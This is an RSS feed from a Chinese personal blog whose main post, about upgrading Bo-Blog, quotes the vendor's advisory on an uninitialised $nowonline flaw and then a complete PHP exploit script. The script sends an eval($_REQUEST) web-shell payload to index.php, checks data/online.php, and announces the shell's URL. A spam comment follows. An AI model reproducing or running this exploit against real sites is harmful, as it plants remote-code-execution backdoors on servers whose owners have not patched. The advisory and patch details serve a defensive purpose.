<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title><![CDATA[向东博客 专注WEB应用 构架之美 --- 构架之美，在于尽态极妍 | 应用之美，在于药到病除]]></title> 
<link>http://jackxiang.com/index.php</link> 
<description><![CDATA[赢在IT，Playin' with IT,Focus on Killer Application,Marketing Meets Technology.]]></description> 
<language>zh-cn</language> 
<copyright><![CDATA[向东博客 专注WEB应用 构架之美 --- 构架之美，在于尽态极妍 | 应用之美，在于药到病除]]></copyright>
<item>
<link>http://jackxiang.com/post/473/</link>
<title><![CDATA[[博客升级]我的bo－blog升级到Bo-Blog 2.0.3了，^_^]]></title> 
<author>jack &lt;xdy108@126.com&gt;</author>
<category><![CDATA[生活笔记]]></category>
<pubDate>Wed, 24 Jan 2007 03:05:10 +0000</pubDate> 
<guid>http://jackxiang.com/post/473/</guid> 
<description>
<![CDATA[ 
	 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;开源的东西用的人多了，就可能有太多的人喜欢读代码，漏洞总是难免的，谢谢bob提供的升级代码，回家过年了。。。。升级后可能就会好些，也难免有新的漏洞发现，还好我的是linux系统因该大概不会有太大的漏洞，^_^。。<br/><br/>最新看到这个漏洞,是CNhCerKF告诉我的.这段时间忙,而且我劝他改用bo-blog结果他告诉我的最新漏洞.后来在网上和官方看了下.官方是11月22日出的补丁.下面是漏洞的信息.BO-blog是php+mysql架设的.目前网络上用的人很多.在玫瑰的博客有在线提交的页面http://www.mghacker.com/bo-blog.htm提交后,一句话马地址是:/data/online.php,直接拿到webshell.<br/>==========================================================<br/>官方补丁说明：http://www.bo-blog.com/bbs/topic_3604<br/>受影响的版本：2.0.x 所有版本<br/>危险等级：高，局部影响<br/>触发条件：<br/>服务器的PHP设置中，register_globals = On。register_globals = Off的情况下不受影响。<br/>解决方法：<br/>2.0.1 SP1用户或者2.0.2 SP2用户：请下载附件中的补丁程序，解压后上传、覆盖原先的文件。<br/>其它版本用户：请先更新到 2.0.1 SP1用户或者2.0.2 SP2 ，然后打补丁，或者在php.ini中关闭register_globals。<br/>===========================================================<br/>Bo-Blog 2.0.2 sp2 出现了 $nowonline 未初始化的漏洞,导致online.php可以注入webshell,看下漏洞攻击的代码<br/><br/><br/>Bo-Blog 2.0.2 sp2 出现了 $nowonline 未初始化的漏洞,导致online.php可以注入webshell,看下漏洞攻击的代码<br/><br/><?<br/>ini_set("max_execution_time",0);<br/>ini_set("default_socket_timeout",5);<br/><br/>$data ='nowonline[]=<?php @eval($_REQUEST[orz]);echo orz;die();?>&1468108794=orz&-1844564458=orz';<br/>$server =$argv[1];<br/>$sitepath =$argv[2];<br/><br/>if($argc!=3)&#123;<br/>hr();<br/>echo" Uaget: boblog.php www.defence80.com /blog/&#92;r&#92;n";<br/>echo" We Are ScriptKiz....&#92;r&#92;n";<br/>hr();<br/>ver();<br/>exit;<br/>&#125;<br/><br/>echo "&#92;r&#92;nExploit For Bo-blog Last Version &#92;r&#92;n";<br/>echo "Need Register Globals = On&#92;r&#92;n";<br/>echo "&#92;r&#92;n";<br/><br/>preg_match('/X-Powered-By: php&#92;/(.+)&#92;r&#92;n/ie',send("",'index.php'),$php);<br/>echo "We Got php version:&#92;t".$php[1]."&#92;r&#92;n";<br/><br/>function send($cmd,$script)<br/>&#123;<br/>global $sitepath,$server,$cookie,$count;<br/><br/>$path =$sitepath.$script;<br/>$count=$count+1;<br/>$message = "POST ".$path." HTTP/1.1&#92;r&#92;n";<br/>$message .= "Accept: */*&#92;r&#92;n";<br/>$message .= "Accept-Language: zh-cn&#92;r&#92;n";<br/>$message .= "Referer: http://".$server.$path."&#92;r&#92;n";<br/>$message .= "Content-Type: application/x-www-form-urlencoded&#92;r&#92;n";<br/>$message .= "Host: ".$server."&#92;r&#92;n";<br/>$message .= "User-Agent: ".$useragent."&#92;r&#92;n";<br/>$message .= "Content-length: ".strlen($cmd)."&#92;r&#92;n";<br/>$message .= "Connection: Keep-Alive&#92;r&#92;n";<br/>$message .= "Cookie: ".$cookie."&#92;r&#92;n";<br/>$message .= "&#92;r&#92;n";<br/>$message .= $cmd."&#92;r&#92;n";<br/><br/>//echo $message;<br/>$fd = @fsockopen( $server, 80 );<br/>@fputs($fd,$message);<br/>$resp = "<-_->";<br/>if($fd)<br/>&#123;<br/>while(!@feof($fd)) &#123;<br/>$resp .= @fread($fd,1024);<br/>&#125;<br/>&#125;<br/>@fclose($fd);<br/>$resp .="</-_->";<br/>//echo $resp;<br/>return $resp;<br/>&#125;<br/><br/>echo "Exploiting:&#92;t&#92;t............&#92;r&#92;n";<br/>$response=send($data,'index.php');<br/><br/>$data='';<br/>$response=send($data,'data/online.php');<br/>if(strstr($response,'orz')) &#123;<br/>echo "We Got Webshell:&#92;thttp://$server$path/data/online.php&#92;r&#92;n";<br/>echo "For Fun :)";<br/>&#125;<br/>else die("Exploit Failed!&#92;r&#92;n");<br/><br/>function ver()&#123;<br/>//版本信息,排列格式花了不少时间啊, - -&#124;&#124;&#124;<br/>echo" +-------------------+ +-------------------+&#92;r&#92;n";<br/>echo" +-www.loveshell.net-+ o'(-_-)'o +-- danger??? --+&#92;r&#92;n";<br/>echo" +-------------------+ 啊？你说不怕火星人啊？ +-------------------+&#92;r&#92;n";<br/>hr();<br/>&#125;<br/><br/>function hr()&#123;<br/>echo" +-------------------------------------------------------------------+&#92;r&#92;n";<br/>&#125;<br/><br/>?><br/>
]]>
</description>
</item><item>
<link>http://jackxiang.com/post/473/#blogcomment63785</link>
<title><![CDATA[[评论] [博客升级]我的bo－blog升级到Bo-Blog 2.0.3了，^_^]]></title> 
<author>burberry outlet &lt;nuomituan239@gmail.com&gt;</author>
<category><![CDATA[评论]]></category>
<pubDate>Mon, 30 Jul 2012 08:25:19 +0000</pubDate> 
<guid>http://jackxiang.com/post/473/#blogcomment63785</guid> 
<description>
<![CDATA[ 
	Ha ha, my lucky, and met such a good content ah, my heart is secretly exclusiveness. Good content can let me feel happy, also can let me learn more knowledge, to enrich themselves. I will continue to focus on such content, the fight with the author to make friends.
]]>
</description>
</item>
</channel>
</rss>